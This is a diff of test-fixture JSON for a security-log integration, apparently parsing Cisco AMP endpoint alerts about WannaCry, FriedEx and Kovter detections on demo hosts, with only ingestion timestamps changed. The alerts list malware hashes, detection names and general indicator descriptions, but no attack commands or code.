pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -2439,7 +2439,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389075200Z", + "ingested": "2021-12-14T14:41:01.444871013Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -2527,7 +2527,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389080600Z", + "ingested": "2021-12-14T14:41:01.444871476Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":797000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2601,7 +2601,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389086Z", + "ingested": "2021-12-14T14:41:01.444871936Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", 
@@ -2673,7 +2673,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389091500Z", + "ingested": "2021-12-14T14:41:01.444872431Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503301\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", 
@@ -2757,7 +2757,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389097100Z", + "ingested": "2021-12-14T14:41:01.444873119Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":893000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437902\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2847,7 +2847,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389102500Z", + "ingested": "2021-12-14T14:41:01.444873519Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":456000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437899\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2921,7 +2921,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389107800Z", + "ingested": "2021-12-14T14:41:01.444873971Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503299\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", 
@@ -3009,7 +3009,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389113200Z", + "ingested": "2021-12-14T14:41:01.444874409Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":957000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3099,7 +3099,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389118500Z", + "ingested": "2021-12-14T14:41:01.444875099Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179209167470598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3189,7 +3189,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389124100Z", + "ingested": "2021-12-14T14:41:01.444875651Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3288,7 +3288,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389129500Z", + "ingested": "2021-12-14T14:41:01.444876166Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":3020,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": 
"alert", 
@@ -3387,7 +3387,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389134900Z", + "ingested": "2021-12-14T14:41:01.444876613Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583840597369422000,\"timestamp\":1610621973,\"timestamp_nanoseconds\":231000000,\"date\":\"2021-01-14T10:59:33+00:00\",\"event_type\":\"Malicious Activity Detection\",\"event_type_id\":1090519105,\"detection\":\"W32.MAP.Ransomware.rewrite\",\"detection_id\":\"6583840593074454529\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mscorsvw.exe\",\"file_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\mscorsvw.exe\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\",\"sha1\":\"c78f4c22dd195a1791472a2c271a0c85b53900d9\",\"md5\":\"75a758a0c5cea48c9922d64a113d0f9d\"},\"parent\":{\"process_id\":480,\"disposition\":\"Clean\",\"file_name\":\"services.exe\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\",\"sha1\":\"ff658a36899e43fec3966d608b4aa4472de7a378\",\"md5\":\"71c85477df9347fe8e7bc55768473fca\"}}}}}", 
"code": "1090519105", "kind": "alert", 
@@ -3472,7 +3472,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389140300Z", + "ingested": "2021-12-14T14:41:01.444877189Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6701398782847286000,\"timestamp\":1610621970,\"timestamp_nanoseconds\":182000000,\"date\":\"2021-01-14T10:59:30+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621970,\"start_date\":\"2021-01-14T10:59:30+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"file:///C%3A/Windows/SysWOW64/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\"}}}}}", "code": "1107296274", "kind": "alert", 
@@ -3559,7 +3559,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389145700Z", + "ingested": "2021-12-14T14:41:01.444877825Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136036637603000,\"timestamp\":1610621707,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-14T10:55:07+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621707,\"start_date\":\"2021-01-14T10:55:07+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. 
Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"file:///C%3A/Windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\"}}}}}", "code": "1107296274", "kind": "alert", 
@@ -3646,7 +3646,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.389151Z", + "ingested": "2021-12-14T14:41:01.444878368Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066250000100,\"timestamp\":1610621237,\"timestamp_nanoseconds\":250000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "code": "1107296274", "kind": "alert", 
